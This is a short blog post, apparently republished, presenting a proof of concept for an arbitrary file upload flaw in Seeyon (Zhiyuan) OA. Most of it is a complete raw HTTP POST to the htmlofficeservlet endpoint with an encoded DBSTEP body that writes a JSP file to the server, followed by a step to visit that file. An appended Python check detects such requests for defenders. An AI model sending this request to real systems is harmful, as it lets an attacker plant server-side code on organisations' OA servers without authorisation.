Seeyon (Zhiyuan) OA arbitrary file upload

2020-12-25 20:27


Visit: http://xxxx/seeyon/htmlofficeservlet, and you see:
[screenshot]
POC:

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
Hello World!");%>6e4f045d4b8506bf492ada7e3390d7ce


Visit: http://xxx/seeyon/test123456.jsp
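
A defender-side check for the request shown above, as an added example that is not part of the original post: it flags a captured HTTP request that POSTs a DBSTEP V3.0 body with OPTION and FILENAME fields and JSP scriptlet delimiters to /seeyon/htmlofficeservlet. The function name, the reason strings and both sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

SERVLET_PATH = "/seeyon/htmlofficeservlet"  # endpoint named on this page
SCRIPT_MARKERS = ("<%", "%>")               # JSP scriptlet delimiters

def inspect_request(raw: str) -> list[str]:
    """Return the reasons a raw HTTP request resembles the upload above."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return []
    method, target = request_line[0].upper(), request_line[1]
    # Normalise the path: drop the query, decode %xx, drop ;jsessionid=...
    path = unquote(target.split("?", 1)[0]).split(";", 1)[0].lower()
    if method != "POST" or not path.rstrip("/").endswith(SERVLET_PATH):
        return []
    reasons = ["POST to htmlofficeservlet"]
    if body.lstrip().startswith("DBSTEP V3.0"):
        reasons.append("DBSTEP V3.0 body")
    # KEY=VALUE lines that follow the DBSTEP header line
    fields = dict(re.findall(r"^(\w+)=(.*)$", body, flags=re.M))
    if "OPTION" in fields and "FILENAME" in fields:
        reasons.append("OPTION and FILENAME fields present")
    if any(marker in body for marker in SCRIPT_MARKERS):
        reasons.append("JSP scriptlet delimiter in body")
    return reasons

# Constructed samples (placeholder values, not captured traffic).
SAMPLE_UPLOAD = (
    "POST /seeyon/htmlofficeservlet HTTP/1.1\r\n"
    "Host: oa.example.test\r\n\r\n"
    "DBSTEP V3.0     0     0     0     DBSTEP=PLACEHOLDER\r\n"
    "OPTION=PLACEHOLDER\r\n"
    "FILENAME=PLACEHOLDER\r\n"
    "placeholder text %>\r\n"
)
SAMPLE_BENIGN = (
    "GET /seeyon/htmlofficeservlet HTTP/1.1\r\n"
    "Host: oa.example.test\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("upload", SAMPLE_UPLOAD), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_request(req))
```

Any request that returns all four reasons deserves a follow-up check of the web root for newly created .jsp files, such as the test123456.jsp requested in the last step.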

Original article: https://www.cnblogs.com/chy4412312/p/14163004.html

